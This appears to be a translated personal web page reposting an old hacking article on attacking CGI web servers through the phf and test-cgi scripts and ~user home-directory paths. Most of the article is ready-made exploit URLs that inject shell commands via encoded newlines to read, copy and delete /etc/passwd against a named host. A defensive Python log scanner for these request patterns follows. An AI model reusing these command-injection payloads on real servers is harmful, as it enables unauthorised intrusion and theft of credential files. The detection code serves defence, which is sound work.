For now I have picked out some commonly used articles to post here; more will be uploaded over time.

The phf attack

Everyone knows about the phf attack by now. phf is a CGI script, and many sites have this vulnerability. Using the request
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
retrieves that site's passwd file. But there are some better ways of running it, such as:
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
The commands executed above are:
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
About the test attack
http://thegnome.com/cgi-bin/test-cgi?\whatever
The server will respond with some information about itself, such as:
CGI/1.0 test script report:
argc is 0. argv is.
SERVER_SOFTWARE=NCSA/1.4B
SERVER_NAME=thegnome.com
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
SERVER_PORT=80
REQUEST_METHOD=GET
HTTP_ACCEPT=text/plain,application/x-html, application/html,text/html,text/x-html
PATH_INFO=
PATH_TRANSLATED=
SCRIPT_NAME=/cgi-bin/test-cgi
QUERY_STRING=whatever
REMOTE_HOST=fifth.column.gov
REMOTE_ADDR=200.200.200.200
REMOTE_USER=
AUTH_TYPE=
CONTENT_TYPE=
CONTENT_LENGTH=
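OK, let's try something more interesting:
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
Application
This mainly concerns the directory shortcut used for many personal home pages. If we request URLs like these:
http://thegnome.com/~root
http://thegnome.com/~root/etc/passwd
This does not work on every platform; it has succeeded on BSD Apache. Of course you can also try ~bin, ~etc, ~uucp ... Please take care not to damage anything.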
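
From the server operator's side, the request shapes described above (phf or test-cgi queries carrying an encoded newline, and ~name requests for system accounts) can be picked out of an access log. The following is an added example, not part of the original article; the log lines are constructed, and the Common Log Format layout and the SYSTEM_HOMES list are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Request field of a Common Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)[^"]*"')
SCRIPTS = ("/cgi-bin/phf", "/cgi-bin/test-cgi")
# ~name requests for system accounts rather than real users (assumed list)
SYSTEM_HOMES = {"root", "bin", "etc", "uucp"}

def classify(target):
    """Return the reasons a request target matches the patterns in the article."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(parts.query)   # decode %0a, %20, %7E before inspecting
    reasons = []
    if path in SCRIPTS:
        name = path.rsplit("/", 1)[1]
        reasons.append(f"{name} requested")
        if "\n" in query or "\r" in query:
            reasons.append(f"{name} query contains an encoded newline")
    m = re.match(r"/~([^/]+)", path)
    if m and m.group(1) in SYSTEM_HOMES:
        reasons.append(f"~{m.group(1)} home-directory request")
    return reasons

def scan(lines):
    """Yield (client, target, reasons) for each log line worth reviewing."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify(m.group(1))
        if reasons:
            yield line.split(" ", 1)[0], m.group(1), reasons

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/1997:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.66 - - [01/Jan/1997:10:00:05 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 812',
    '192.0.2.66 - - [01/Jan/1997:10:00:09 +0000] "GET /cgi-bin/test-cgi?\\whatever HTTP/1.0" 200 640',
    '192.0.2.66 - - [01/Jan/1997:10:00:12 +0000] "GET /~root/etc/passwd HTTP/1.0" 404 210',
    '192.0.2.20 - - [01/Jan/1997:10:00:15 +0000] "GET /~alice/ HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, target, "; ".join(reasons))
```

A hit on phf or test-cgi is also a prompt to check whether those sample scripts are still installed in cgi-bin at all.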

 
 

 I had originally planned to put together some tutorials on ps, but gave up for lack of time! Everyone is welcome to contribute. ^-^

 

 

 

 

 

 

 

 

 

 

This site's address: voguetoday.126.com


If you have any comments or good suggestions, feel free to raise them and leave me a message, or send them to my mailbox:

xiaottyy@163.com

 
